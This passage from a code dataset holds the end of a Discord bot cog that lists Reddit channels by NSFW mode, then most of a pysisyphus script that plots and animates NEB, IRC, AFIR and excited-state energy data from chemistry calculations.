\")\n\n if db_get_conf_server_all(ctx.guild.id)[0] == 0: # Checking current nsfw_mode (disabled)\n for a, b in zip_longest(c_list_sfw[::2], c_list_sfw[1::2]): # List format to get 1/2 pairs\n if b is not None:\n embed.add_field(name=a, value=b, inline=True)\n else:\n embed.add_field(name=a, value='', inline=True)\n\n elif db_get_conf_server_all(ctx.guild.id)[0] == 1: # Checking current nsfw_mode (semi-enabled)\n if ctx.channel.id in db_get_nsfw_channels(ctx.guild.id): # If channel is an authorized nsfw channel\n for a, b in zip_longest(c_list_nsfw[::2], c_list_nsfw[1::2]): # # List format to get 1/2 pairs\n if b is not None:\n embed.add_field(name=a, value=b, inline=True)\n else:\n embed.add_field(name=a, value='.', inline=True)\n else:\n for a, b in zip_longest(c_list_sfw[::2], c_list_sfw[1::2]):\n if b is not None:\n embed.add_field(name=a, value=b, inline=True)\n else:\n embed.add_field(name=a, value='.', inline=True)\n\n elif db_get_conf_server_all(ctx.guild.id)[0] == 2: # Checking current nsfw_mode (enable)\n for a, b in zip_longest(c_list_nsfw[::2], c_list_nsfw[1::2]): # # List format to get 1/2 pairs\n if b is not None:\n embed.add_field(name=a, value=b, inline=True)\n else:\n embed.add_field(name=a, value='.', inline=True)\n\n await ctx.channel.send(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(RedditScrap(bot))\n\n# For the reddit_scrapping COG : ##\n# Improve Gif-conversion system to handle all cases and be flexible\n# Get the script async to avoid huge lagtime\n# Adds logs to know user statistics\n","repo_name":"Demokdawa/Blackstone-bot","sub_path":"cogs/reddit_bot.py","file_name":"reddit_bot.py","file_ext":"py","file_size_in_byte":10926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"21002848445","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nfrom pathlib import Path\nimport sys\n\nimport h5py\nimport matplotlib\nfrom matplotlib.animation import FuncAnimation\nfrom matplotlib.patches import Rectangle\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.interpolate import splrep, splev\nimport yaml\n\nfrom pysisyphus.constants import AU2KJPERMOL, BOHR2ANG, AU2EV\nfrom pysisyphus.cos.NEB import NEB\nfrom pysisyphus.Geometry import Geometry\nfrom pysisyphus.peakdetect import peakdetect\nfrom pysisyphus.wrapper.jmol import render_cdd_cube\n\n\nCDD_PNG_FNS = \"cdd_png_fns\"\n\n\nclass Plotter:\n def __init__(self, coords, data, ylabel, interval=750, save=None,\n legend=None):\n self.coords = coords\n self.data = data\n self.ylabel = ylabel\n self.interval = interval\n self.save = save\n self.legend = legend\n\n # First image of the first cycle\n self.anchor = self.coords[0][0]\n self.cycles = len(self.data)\n self.pause = True\n\n self.fig, self.ax = plt.subplots()\n self.fig.canvas.mpl_connect('key_press_event', self.on_keypress)\n\n self.ax.set_xlabel(\"Path length / Bohr\")\n y_min = self.data.min()\n y_max = self.data.max()\n self.ax.set_ylim(y_min, y_max)\n self.ax.set_ylabel(self.ylabel)\n\n self.coord_diffs = self.get_coord_diffs(self.coords)\n\n if self.data.ndim == 2:\n self.update_func = self.update_plot\n elif self.data.ndim == 3:\n self.update_func = self.update_plot2\n\n def get_coord_diffs(self, coords, normalize=False):\n coord_diffs = list()\n for per_cycle in coords:\n tmp_list = [0, ]\n for i in range(len(per_cycle)-1):\n diff = np.linalg.norm(per_cycle[i+1]-per_cycle[i])\n tmp_list.append(diff)\n tmp_list = np.cumsum(tmp_list)\n offset = 
np.linalg.norm(self.anchor-per_cycle[0])\n tmp_list += offset\n if normalize:\n tmp_list /= tmp_list.max()\n coord_diffs.append(tmp_list)\n return np.array(coord_diffs)\n\n def update_plot(self, i):\n \"\"\"Use this when only 1 state is present.\"\"\"\n self.fig.suptitle(\"Cycle {}\".format(i))\n self.lines[0].set_xdata(self.coord_diffs[i])\n self.lines[0].set_ydata(self.data[i])\n if self.save:\n self.save_png(i)\n\n def update_plot2(self, i):\n \"\"\"Use this when several states are present.\"\"\"\n self.fig.suptitle(\"Cycle {}\".format(i))\n for j, line in enumerate(self.lines):\n line.set_ydata(self.data[i][:, j])\n if self.save:\n self.save_png(i)\n\n def save_png(self, frame):\n frame_fn = f\"step{frame}.png\"\n if not os.path.exists(frame_fn):\n self.fig.savefig(frame_fn)\n\n def animate(self):\n self.lines = self.ax.plot(self.coord_diffs[0], self.data[0], \"o-\")\n if self.legend:\n self.ax.legend(self.lines, self.legend)\n self.animation = FuncAnimation(\n self.fig,\n self.update_func,\n frames=self.cycles,\n interval=self.interval\n )\n if self.save:\n self.animation.save(\"animation.gif\", writer='imagemagick', fps=5)\n plt.show()\n\n def on_keypress(self, event):\n \"\"\"Pause on SPACE press.\"\"\"\n #https://stackoverflow.com/questions/41557578\n if event.key == \" \":\n if self.pause:\n self.animation.event_source.stop()\n else:\n self.animation.event_source.start()\n self.pause = not self.pause\n\n\ndef plot_energies():\n keys = (\"energy\", \"cart_coords\")\n (energies, coords), num_cycles, num_images = load_results(keys)\n\n if isinstance(num_images, list):\n print(\"Please use --aneb instead of --energies\")\n return\n\n lengths = np.array([len(e) for e in energies])\n equal_lengths = lengths == lengths[-1]\n # Hack to support growing string calculations\n energies = np.array([e for e, l in zip(energies, equal_lengths) if l])\n coords = np.array([c for c, l in zip(coords, equal_lengths) if l])\n num_cycles, num_images = energies.shape\n\n energies -= energies.min()\n energies *= AU2KJPERMOL\n\n # Static plot of path with equally spaced images\n fig, ax = plt.subplots()\n colors = matplotlib.cm.Greys(np.linspace(.2, 1, num=num_cycles))\n for cycle, color in zip(energies, colors):\n ax.plot(cycle, \"o-\", color=color)\n ax.set_title(\"Energies\")\n\n kwargs = {\n \"ls\": \":\",\n \"color\": \"darkgrey\",\n }\n try:\n last_cycle = energies[-1]\n spl = splrep(np.arange(num_images), last_cycle)\n # Calculate interpolated values\n x2 = np.linspace(0, num_images, 100)\n y2 = splev(x2, spl)\n # Only consider maxima\n peak_inds, _ = peakdetect(y2, lookahead=2)\n if not peak_inds:\n ax.plot(x2, y2)\n else:\n peak_inds = np.array(peak_inds)[:, 0].astype(int)\n peak_xs = x2[peak_inds]\n peak_ys = y2[peak_inds]\n ax.plot(x2, y2, peak_xs, peak_ys, \"x\")\n for px, py in zip(peak_xs, peak_ys):\n ax.axhline(y=py, **kwargs)\n line = matplotlib.lines.Line2D([px, px], [0, py], **kwargs)\n ax.add_line(line)\n except TypeError:\n print(\"Not enough images for splining!\")\n\n # Always draw a line at the minimum y=0\n ax.axhline(y=0, **kwargs)\n ax.set_xlabel(\"Image\")\n ax.set_ylabel(\"dE / kJ mol⁻¹\")\n\n fig2, ax2 = plt.subplots()\n last_energies = energies[-1].copy()\n xs = np.arange(len(last_energies))\n ax2.plot(xs, last_energies, \"o-\")\n ax2.set_xlabel(\"Image\")\n ax2.set_ylabel(\"$\\Delta$E / kJ mol⁻¹\")\n ax2.set_title(f\"Cycle {len(energies)-1}\")\n\n first_image_en = last_energies[0]\n last_image_en = last_energies[-1]\n max_en_ind = last_energies.argmax()\n max_en = 
last_energies[max_en_ind]\n print( \"Barrier heights using actual energies (not splined) from \"\n f\"cycle {energies.shape[0]-1}.\")\n print(f\"\\tHighest energy image (HEI) at index {max_en_ind} (0-based)\")\n\n first_barr = max_en - first_image_en\n print(f\"\\tBarrier between first image and HEI: {first_barr:.1f} kJ mol⁻¹\")\n last_barr = max_en - last_image_en\n print(f\"\\tBarrier between last image and HEI: {last_barr:.1f} kJ mol⁻¹\")\n\n # Also do an animation\n plotter = Plotter(coords, energies, \"ΔE / au\", interval=250, save=False)\n # This calls plt.show()\n plotter.animate()\n\n\ndef plot_aneb():\n keys = (\"energy\", \"cart_coords\")\n (energies, coords), num_cycles, num_images = load_results(keys)\n\n # Use coordinates of the first image in the first cycle as\n # anchor for all following cycles.\n first_coords = coords[0][0]\n\n coord_diffs = list()\n min_ = 0\n max_ = max(energies[0])\n for en, c in zip(energies, coords):\n cd = np.linalg.norm(c - first_coords, axis=1)\n min_ = min(min_, min(en))\n max_ = max(max_, max(en))\n coord_diffs.append(cd)\n\n energies_ = list()\n au2kJmol = 2625.499638\n for en in energies:\n en = np.array(en)\n en -= min_\n en *= au2kJmol\n energies_.append(en)\n\n fig, ax = plt.subplots()\n # Initial energies\n lines = ax.plot(coord_diffs[0], energies_[0], \"o-\")\n y_max = (max_ - min_) * au2kJmol\n ax.set_ylim(0, y_max)\n\n ax.set_xlabel(\"Coordinate differences / Bohr\")\n ax.set_ylabel(\"$\\Delta$J / kJ $\\cdot$ mol$^{-1}$\")\n\n def update_func(i):\n fig.suptitle(\"Cycle {}\".format(i))\n lines[0].set_xdata(coord_diffs[i])\n lines[0].set_ydata(energies_[i])\n\n def animate():\n animation = FuncAnimation(\n fig,\n update_func,\n frames=num_cycles,\n interval=250,\n )\n return animation\n anim = animate()\n plt.show()\n\n\ndef load_results(keys):\n if isinstance(keys, str):\n keys = (keys, )\n image_results_fn = \"image_results.yaml\"\n print(f\"Reading {image_results_fn}\")\n with open(image_results_fn) as handle:\n all_results = yaml.load(handle.read(), Loader=yaml.Loader)\n num_cycles = len(all_results)\n\n results_list = list()\n for key in keys:\n tmp_list = list()\n for res_per_cycle in all_results:\n try:\n tmp_list.append([res[key] for res in res_per_cycle])\n except KeyError:\n print(f\"Key '{key}' not present in {image_results_fn}. Exiting.\")\n sys.exit()\n results_list.append(np.array(tmp_list))\n # The length of the second axis correpsonds to the number of images\n # Determine the number of images. If we have the same number of images\n # set num_images to this number. 
Otherwise return a list containing\n # the number of images.\n num_images = np.array([len(cycle) for cycle in results_list[0]])\n if all(num_images[0] == num_images):\n num_images = num_images[0]\n print(f\"Found path with {num_images} images.\")\n # Flatten the first axis when we got only a single key\n if len(results_list) == 1:\n results_list = results_list[0]\n print(f\"Loaded {num_cycles} cycle(s).\")\n return results_list, num_cycles, num_images\n\n\ndef plot_cosgrad():\n keys = (\"energy\", \"forces\", \"coords\")\n (energies, forces, coords), num_cycles, num_images = load_results(keys)\n atom_num = coords[0][0].size // 3\n dummy_atoms =[\"H\"] * atom_num\n\n all_nebs = list()\n all_perp_forces = list()\n for i, per_cycle in enumerate(zip(energies, forces, coords), 1):\n ens, frcs, crds = per_cycle\n images = [Geometry(dummy_atoms, per_image) for per_image in crds]\n for image, en, frc in zip(images, ens, frcs):\n image._energy = en\n image._forces = frc\n\n neb = NEB(images)\n all_nebs.append(neb)\n pf = neb.perpendicular_forces.reshape(num_images, -1)\n all_perp_forces.append(pf)\n\n # Calculate norms of true force\n # Shape (cycles, images, coords)\n force_norms = np.linalg.norm(forces, axis=2)\n all_max_forces = list()\n all_rms_forces = list()\n rms = lambda arr: np.sqrt(np.mean(np.square(arr)))\n for pf in all_perp_forces:\n max_forces = pf.max(axis=1)\n all_max_forces.append(max_forces)\n rms_forces = np.apply_along_axis(rms, 1, pf)\n all_rms_forces.append(rms_forces)\n all_max_forces = np.array(all_max_forces)\n all_rms_forces = np.array(all_rms_forces)\n\n fig, (ax0, ax1, ax2) = plt.subplots(sharex=True, nrows=3)\n def plot(ax, data, title):\n colors = matplotlib.cm.Greys(np.linspace(0, 1, num=data.shape[0]))\n for row, color in zip(data, colors):\n ax.plot(row, \"o-\", color=color)\n ax.set_yscale('log')\n if title:\n ax.set_title(title)\n plot(ax0, all_max_forces, \"max(perpendicular gradient)\")\n plot(ax1, all_rms_forces, \"rms(perpendicular gradient)\")\n plot(ax2, force_norms, \"norm(true gradient)\")\n ax2.set_xlabel(\"Images\")\n\n plt.tight_layout()\n plt.show()\n\n\ndef plot_multistate_pes(keys):\n (pes_ens, coords), num_cycles, num_images = load_results(keys)\n pes_ens -= pes_ens.min(axis=(2, 1), keepdims=True)\n pes_ens *= 27.211396\n\n plotter = Plotter(coords, pes_ens, \"ΔE / eV\")\n plotter.animate()\n\n\ndef plot_params(inds):\n def get_bond_length(coords_slice):\n return np.linalg.norm(coords_slice[0]-coords_slice[1]) * BOHR2ANG * 100\n\n def get_angle(coords_slice):\n vec1 = coords_slice[0] - coords_slice[1]\n vec2 = coords_slice[2] - coords_slice[1]\n vec1n = np.linalg.norm(vec1)\n vec2n = np.linalg.norm(vec2)\n dotp = np.dot(vec1, vec2)\n radians = np.arccos(dotp / (vec1n * vec2n))\n return radians * 180 / np.pi\n\n def get_dihedral(coords_slice):\n raise Exception(\"Not implemented yet!\")\n\n type_dict = {\n 2: (\"bond length / pm\", get_bond_length),\n 3: (\"angle / °\", get_angle),\n 4: (\"dihedral / °\", get_dihedral)\n }\n inds_list = [[int(i) for i in i_.split()] for i_ in inds.split(\",\")]\n ylabels, funcs = zip(*[type_dict[len(inds)] for inds in inds_list])\n assert all([len(inds_list[i]) == len(inds_list[i+1])\n for i in range(len(inds_list)-1)]), \"Can only display \" \\\n \"multiple coordinates of the same type (bond, angle or \" \\\n \"dihedral.\"\n # Just use the first label because they all have to be the same\n ylabel = ylabels[0]\n\n key = \"coords\"\n # only allow same type of coordinate if multiple coordinates are given?\n coords, 
num_cycles, num_images = load_results(key)\n\n # Coordinates for all images for all cycles\n ac = list()\n for i, per_cycle in enumerate(coords):\n # Coordinates for all images per cycle\n pc = list()\n for j, per_image in enumerate(per_cycle):\n # Coordinates per ind for all images\n pi = list()\n for inds, func in zip(inds_list, funcs):\n coords_slice = per_image.reshape(-1, 3)[inds]\n param = func(coords_slice)\n pi.append(param)\n pc.append(pi)\n ac.append(pc)\n\n ac_arr = np.array(ac)\n\n # Construct legend list\n legend = [\"-\".join([str(i) for i in inds]) for inds in inds_list]\n plotter = Plotter(coords, ac_arr, ylabel, legend=legend)\n plotter.animate()\n\n #df = pd.DataFrame(ac_arr)\n #cmap = plt.get_cmap(\"Greys\")\n #ax = df.plot(\n # title=f\"Params {inds}\",\n # colormap=cmap,\n # legend=False,\n # marker=\"o\",\n # xticks=range(num_images),\n # xlim=(0, num_images-1),\n #)\n #ax.set_xlabel(\"Image\")\n #ax.set_ylabel(ylabel)\n #plt.tight_layout()\n plt.show()\n\n\ndef plot_all_energies(h5):\n with h5py.File(h5) as handle:\n energies = handle[\"all_energies\"][:]\n roots = handle[\"roots\"][:]\n flips = handle[\"root_flips\"][:]\n print(f\"Found a total of {len(roots)} steps.\")\n print(f\"{flips} root flips occured.\")\n\n energies -= energies.min()\n energies *= AU2EV\n\n # Don't plot steps where flips occured\n # energies = np.concatenate((energies[0][None,:], energies[1:,:][~flips]), axis=0)\n energies_ = list()\n roots_ = list()\n steps = list()\n for i, root_flip in enumerate(flips[:-1]):\n if root_flip:\n print(f\"Root flip occured between {i} and {i+1}.\")\n continue\n print(f\"Using step {i}\")\n energies_.append(energies[i])\n roots_.append(roots[i])\n steps.append(i)\n # Don't append last step if a root flip occured there.\n if not flips[-1]:\n energies_.append(energies[-1])\n roots_.append(roots[-1])\n steps.append(i+1)\n else:\n print(\"Root flip occured in the last step. 
Not showing the last step.\")\n\n energies = np.array(energies_)\n roots = np.array(roots_)\n\n fig, ax = plt.subplots()\n for i, state in enumerate(energies.T):\n ax.plot(steps, state, \"o-\", label=f\"State {i:03d}\")\n ax.legend(loc=\"lower center\", ncol=3)\n ax.set_xlabel(\"Step\")\n ax.set_ylabel(\"$\\Delta E / eV$\")\n root_ens = [s[r] for s, r in zip(energies, roots)]\n ax.plot(steps, root_ens, \"--k\")\n plt.show()\n\n\ndef plot_bare_energies(h5):\n with h5py.File(h5) as handle:\n energies = handle[\"all_energies\"][:]\n print(f\"Found a total of {len(energies)} steps.\")\n\n energies -= energies.min()\n energies *= AU2EV\n steps = np.arange(len(energies))\n\n fig, ax = plt.subplots()\n for i, state in enumerate(energies.T):\n ax.plot(steps, state, \"o-\", label=f\"State {i:03d}\")\n ax.legend(loc=\"lower center\", ncol=3)\n ax.set_xlabel(\"Step\")\n ax.set_ylabel(\"$\\Delta E / eV$\")\n plt.show()\n\n\ndef plot_overlaps(h5, thresh=.1):\n with h5py.File(h5) as handle:\n overlaps = handle[\"overlap_matrices\"][:]\n ovlp_type = handle[\"ovlp_type\"][()].decode()\n ovlp_with = handle[\"ovlp_with\"][()].decode()\n roots = handle[\"roots\"][:]\n calculated_roots = handle[\"calculated_roots\"][:]\n ref_cycles = handle[\"ref_cycles\"][:]\n ref_roots = handle[\"ref_roots\"][:]\n try:\n cdd_img_fns = handle[\"cdd_imgs\"][:]\n except KeyError:\n print(f\"Couldn't find image data in '{h5}'.\")\n try:\n with open(CDD_PNG_FNS) as handle:\n cdd_img_fns = handle.read().split()\n print(f\"Found image data in '{CDD_PNG_FNS}'\")\n except FileNotFoundError:\n cdd_img_fns = None\n cdd_imgs = None\n if cdd_img_fns is not None:\n try:\n cdd_imgs = [mpimg.imread(fn) for fn in cdd_img_fns]\n except FileNotFoundError:\n png_paths = [Path(fn.decode()).name for fn in cdd_img_fns]\n cdd_imgs = [mpimg.imread(fn) for fn in png_paths]\n\n overlaps[np.abs(overlaps) < thresh] = np.nan\n print(f\"Found {len(overlaps)} overlap matrices.\")\n print(f\"Roots: {roots}\")\n print(f\"Reference cycles: {ref_cycles}\")\n print(f\"Reference roots: {ref_roots}\")\n\n print(\"Key-bindings:\")\n print(\"i: switch between current and first cycle.\")\n print(\"e: switch between current and last cycle.\")\n\n fig, ax = plt.subplots()\n\n n_states = overlaps[0].shape[0]\n\n def draw(i):\n fig.clf()\n if cdd_imgs is not None:\n ax = fig.add_subplot(121)\n ax1 = fig.add_subplot(122)\n else:\n ax = fig.add_subplot(111)\n ax1 = None\n o = np.abs(overlaps[i])\n im = ax.imshow(o, vmin=0, vmax=1)\n # fig.colorbar(im)\n ax.grid(color=\"#CCCCCC\", linestyle='--', linewidth=1)\n ax.set_xticks(np.arange(n_states, dtype=np.int))\n ax.set_yticks(np.arange(n_states, dtype=np.int))\n ax.set_xlabel(\"new states\")\n ax.set_ylabel(\"reference states\")\n for (l,k), value in np.ndenumerate(o):\n if np.isnan(value):\n continue\n value_str = f\"{abs(value):.2f}\"\n ax.text(k, l, value_str, ha='center', va='center')\n j, k = ref_cycles[i], i+1\n ref_root = ref_roots[i]\n ref_ind = ref_root - 1\n old_root = calculated_roots[i+1]\n new_root = roots[i+1]\n ref_overlaps = o[ref_ind]\n if ovlp_type == \"wf\":\n ref_ind += 1\n argmax = np.nanargmax(ref_overlaps)\n xy = (argmax-0.5, ref_ind-0.5)\n highlight = Rectangle(xy, 1, 1,\n fill=False, color=\"red\", lw=\"4\")\n ax.add_artist(highlight)\n if ax1:\n ax1.imshow(cdd_imgs[i])\n fig.suptitle(f\"overlap {i:03d}\\n\"\n f\"{ovlp_type} overlap between {j:03d} and {k:03d}\\n\"\n f\"old root: {old_root}, new root: {new_root}\")\n fig.canvas.draw()\n draw(0)\n\n i = 0\n i_backup = i\n i_last = len(overlaps)-1\n 
def press(event):\n nonlocal i\n nonlocal i_backup\n if event.key == \"left\":\n i = max(0, i-1)\n elif event.key == \"right\":\n i = min(i_last, i+1)\n # Switch between current and first cycle\n elif event.key == \"i\":\n if i == 0:\n # Restore previous cycle\n i = i_backup\n else:\n # Save current i and jump to the first cycle/image\n i_backup = i\n i = 0\n # Switch between current and last cycle\n elif event.key == \"e\":\n if i == i_last:\n # Restore previous cycle\n i = i_backup\n else:\n # Save current i and jump to the first cycle/image\n i_backup = i\n i = i_last\n else:\n return\n draw(i)\n fig.canvas.mpl_connect(\"key_press_event\", press)\n plt.show()\n\n\ndef render_cdds(h5):\n with h5py.File(h5) as handle:\n cdd_cubes = handle[\"cdd_cubes\"][:].astype(str)\n orient = handle[\"orient\"][()].decode()\n cdd_cubes = [Path(cub) for cub in cdd_cubes]\n print(f\"Found {len(cdd_cubes)} CDD cube filenames in {h5}\")\n # Check if cubes exist\n non_existant_cubes = [cub for cub in cdd_cubes if not cub.exists()]\n existing_cubes = [str(cub) for cub in set(cdd_cubes) - set(non_existant_cubes)]\n if any(non_existant_cubes):\n print(\"Couldn't find cubes:\")\n print(\"\\n\".join([\"\\t\" + str(cub) for cub in non_existant_cubes]))\n print(\"Dropping full path and looking only for cube names.\")\n cub_names = [cub.name for cub in non_existant_cubes]\n _ = [cub for cub in cub_names if Path(cub).exists()]\n existing_cubes = existing_cubes + _\n cdd_cubes = existing_cubes\n\n # Create list of all final PNG filenames\n png_fns = [Path(cube).with_suffix(\".png\") for cube in cdd_cubes]\n # Check which cubes are already rendered\n png_stems = [png.stem for png in png_fns\n if png.exists()]\n print(f\"{len(png_stems)} cubes seem already rendered.\")\n\n # Only render cubes that are not yet rendered\n cdd_cubes = [cube for cube in cdd_cubes\n if Path(cube).stem not in png_stems]\n print(f\"Rendering {len(cdd_cubes)} CDD cubes.\")\n\n for i, cube in enumerate(cdd_cubes):\n print(f\"Rendering cube {i+1:03d}/{len(cdd_cubes):03d}\")\n _ = render_cdd_cube(cube, orient=orient)\n joined = \"\\n\".join([str(fn) for fn in png_fns])\n with open(CDD_PNG_FNS, \"w\") as handle:\n handle.write(joined)\n print(\"Rendered PNGs:\")\n print(joined)\n print(f\"Wrote list of rendered PNGs to '{CDD_PNG_FNS}'\")\n\n\ndef plot_afir():\n with open(\"image_results.yaml\") as handle:\n res = yaml.load(handle.read(), Loader=yaml.loader.Loader)\n\n afir_ens = [_[\"energy\"] for _ in res]\n true_ens = [_[\"true_energy\"] for _ in res]\n afir_ens = np.array(afir_ens) * AU2KJPERMOL\n afir_ens -= afir_ens.min()\n true_ens = np.array(true_ens) * AU2KJPERMOL\n true_ens -= true_ens.min()\n\n afir_forces = np.linalg.norm([_[\"forces\"] for _ in res], axis=1)\n true_forces = np.linalg.norm([_[\"true_forces\"] for _ in res], axis=1)\n afir_forces = np.array(afir_forces)\n true_forces = np.array(true_forces)\n\n\n fig, (en_ax, forces_ax) = plt.subplots(nrows=2, sharex=True)\n\n style1 = \"r--\"\n style2 = \"g--\"\n style3 = \"bo-\"\n\n l1 = en_ax.plot(afir_ens, style1, label=\"AFIR\")\n l2 = en_ax.plot(true_ens, style2, label=\"True\")\n en_ax2 = en_ax.twinx()\n l3 = en_ax2.plot(true_ens+afir_ens, style3, label=\"Sum\")\n en_ax2.tick_params(axis=\"y\", labelcolor=\"blue\")\n\n lines = l1 + l2 + l3\n labels = [l.get_label() for l in lines]\n en_ax.legend(lines, labels, loc=0)\n\n en_ax.set_title(\"Energies\")\n en_ax.set_ylabel(\"$\\Delta$E kJ / mol\")\n\n forces_ax.set_title(\"||Forces||\")\n l1 = forces_ax.plot(afir_forces, style1, 
label=\"AFIR\")\n l2 = forces_ax.plot(true_forces, style2, label=\"True\")\n\n forces_ax2 = forces_ax.twinx()\n l3 = forces_ax2.plot(true_forces + afir_forces, style3, label=\"Sum\")\n forces_ax2.tick_params(axis=\"y\", labelcolor=\"blue\")\n\n lines = l1 + l2 + l3\n labels = [l.get_label() for l in lines]\n forces_ax.legend(lines, labels, loc=0)\n\n peak_inds, _ = peakdetect(true_ens, lookahead=2)\n print(f\"Peaks: {peak_inds}\")\n try:\n peak_xs, peak_ys = zip(*peak_inds)\n highest = np.argmax(peak_ys)\n\n en_ax.scatter(peak_xs, peak_ys, s=100, marker=\"X\", c=\"k\", zorder=10)\n en_ax.scatter(peak_xs[highest], peak_ys[highest],\n s=150, marker=\"X\", c=\"k\", zorder=10)\n en_ax.axvline(peak_xs[highest], c=\"k\", ls=\"--\")\n forces_ax.axvline(peak_xs[highest], c=\"k\", ls=\"--\")\n except ValueError as err:\n print(\"Peak-detection failed!\")\n\n # fig.legend(loc=\"upper right\")\n plt.tight_layout()\n plt.show()\n\n\ndef parse_args(args):\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--first\", type=int,\n help=\"Only consider the first [first] cycles.\")\n parser.add_argument(\"--last\", type=int,\n help=\"Only consider the last [last] cycles.\")\n parser.add_argument(\"--h5\", default=\"overlap_data.h5\")\n parser.add_argument(\"--orient\", default=\"\")\n\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"--saras\", action=\"store_true\",\n help=\"Plot OpenMolcas state average potential energy \"\n \"surfaces over the course of the NEB.\")\n group.add_argument(\"--tddft\", action=\"store_true\",\n help=\"Plot ORCA TDDFT potential energy surfaces \"\n \"over the course of the NEB.\")\n group.add_argument(\"--params\",\n help=\"Follow internal coordinates over the course of \"\n \"the NEB. All atom indices have to be 0-based. \"\n \"Use two indices for a bond, three indices for \"\n \"an angle and four indices for a dihedral. \"\n \"The indices for different coordinates have to \"\n \"be separated by ','.\")\n group.add_argument(\"--cosgrad\", \"--cg\", action=\"store_true\",\n help=\"Plot image gradients along the path.\")\n group.add_argument(\"--energies\", \"-e\", action=\"store_true\",\n help=\"Plot energies.\")\n group.add_argument(\"--aneb\", action=\"store_true\",\n help=\"Plot Adaptive NEB.\")\n group.add_argument(\"--all_energies\", \"-a\", action=\"store_true\",\n help=\"Plot ground and excited state energies from 'overlap_data.h5'.\"\n )\n group.add_argument(\"--bare_energies\", \"-b\", action=\"store_true\",\n help=\"Plot ground and excited state energies from 'overlap_data.h5'.\"\n )\n group.add_argument(\"--afir\", action=\"store_true\",\n help=\"Plot AFIR and true -energies and -forces from an AFIR calculation.\"\n )\n group.add_argument(\"--opt\", action=\"store_true\",\n help=\"Plot optimization progress.\"\n )\n group.add_argument(\"--irc\", action=\"store_true\",\n help=\"Plot IRC progress.\"\n )\n group.add_argument(\"--overlaps\", \"-o\", action=\"store_true\")\n group.add_argument(\"--render_cdds\", action=\"store_true\")\n\n return parser.parse_args(args)\n\n\ndef plot_opt(h5_fn=\"optimization.h5\", group_name=\"opt\"):\n with h5py.File(\"optimization.h5\", \"r\") as handle:\n group = handle[group_name]\n cur_cycle = group[\"cur_cycle\"][()]\n ens = group[\"energies\"][:cur_cycle]\n is_cos = group[\"is_cos\"][()]\n max_forces = group[\"max_forces\"][:cur_cycle]\n rms_forces = group[\"rms_forces\"][:cur_cycle]\n\n ens -= ens.min()\n ens *= AU2KJPERMOL\n if is_cos:\n print(\"COS optimization detected. 
Plotting total energy of all images \"\n \"in every cycle. Results from optimizing growing COS methods can \"\n \"be plotted but the plots are not really useful as the varying \"\n \"number of images is not considered.\")\n ens = ens.sum(axis=1)\n\n ax_kwargs = {\n \"marker\": \"o\",\n }\n\n fig, (ax0, ax1, ax2) = plt.subplots(nrows=3, sharex=True)\n\n ax0.plot(ens, **ax_kwargs)\n ax0.set_ylabel(\"$\\Delta E$ / kJ mol⁻¹\")\n\n ax1.plot(max_forces, **ax_kwargs)\n ax1.set_title(\"max(forces)\")\n ax1.set_ylabel(\"$E_h$ Bohr⁻¹ (rad)⁻¹\")\n\n ax2.plot(rms_forces, **ax_kwargs)\n ax2.set_title(\"rms(forces)\")\n ax2.set_xlabel(\"Step\")\n ax2.set_ylabel(\"$E_h$ Bohr⁻¹ (rad)⁻¹\")\n\n fig.suptitle(str(h5_fn) + \"/\" + group_name)\n plt.show()\n\n\ndef plot_irc():\n cwd = Path(\".\")\n h5s = cwd.glob(\"*irc_data.h5\")\n for h5 in h5s:\n type_ = h5.name.split(\"_\")[0]\n title = f\"{type_.capitalize()} IRC data\"\n _ = plot_irc_h5(h5, title)\n plt.show()\n\n\ndef plot_irc_h5(h5, title=None):\n print(f\"Reading IRC data {h5}\")\n with h5py.File(h5, \"r\") as handle:\n mw_coords = handle[\"mw_coords\"][:]\n energies = handle[\"energies\"][:]\n gradients = handle[\"gradients\"][:]\n rms_grad_thresh = handle[\"rms_grad_thresh\"][()]\n try:\n ts_index = handle[\"ts_index\"][()]\n except KeyError:\n ts_index = None\n\n energies -= energies[0]\n energies *= AU2KJPERMOL\n\n cds = np.linalg.norm(mw_coords - mw_coords[0], axis=1)\n rms_grads = np.sqrt(np.mean(gradients**2, axis=1))\n max_grads = np.abs(gradients).max(axis=1)\n\n fig, (ax0, ax1, ax2) = plt.subplots(nrows=3, sharex=True)\n\n plt_kwargs = {\n \"linestyle\": \"-\",\n \"marker\": \"o\",\n }\n\n ax0.plot(cds, energies, **plt_kwargs)\n ax0.set_title(\"energy change\")\n ax0.set_ylabel(\"kJ mol⁻¹\")\n\n ax1.plot(cds, rms_grads, **plt_kwargs)\n ax1.axhline(rms_grad_thresh, linestyle=\"--\", color=\"k\")\n ax1.set_title(\"rms(gradient)\")\n ax1.set_ylabel(\"Hartree / bohr\")\n\n ax2.plot(cds, max_grads, **plt_kwargs)\n ax2.set_title(\"max(gradient)\")\n ax2.set_xlabel(\"IRC / amu$^{\\\\frac{1}{2}}$ bohr\")\n ax2.set_ylabel(\"Hartree / bohr\")\n\n if ts_index:\n x = cds[ts_index]\n for ax, arr in ((ax0, energies), (ax1, rms_grads), (ax2, max_grads)):\n xy = (x, arr[ts_index])\n ax.annotate(\"TS\", xy, fontsize=12, fontweight=\"bold\")\n\n if title:\n fig.suptitle(title)\n else:\n fig.tight_layout()\n\n return fig, (ax0, ax1, ax2)\n\n\ndef run():\n args = parse_args(sys.argv[1:])\n\n h5 = args.h5\n\n if args.energies:\n plot_energies()\n elif args.saras:\n keys = (\"sa_energies\", \"coords\")\n plot_multistate_pes(keys)\n elif args.tddft:\n keys = (\"tddft_energies\", \"coords\")\n plot_multistate_pes(keys)\n elif args.params:\n plot_params(args.params)\n elif args.cosgrad:\n plot_cosgrad()\n elif args.aneb:\n plot_aneb()\n elif args.all_energies:\n plot_all_energies(h5=h5)\n elif args.overlaps:\n plot_overlaps(h5=h5)\n elif args.render_cdds:\n render_cdds(h5=h5)\n elif args.bare_energies:\n plot_bare_energies(h5=h5)\n elif args.afir:\n plot_afir()\n elif args.opt:\n plot_opt()\n elif args.irc:\n plot_irc()\n\n\nif __name__ == \"__main__\":\n 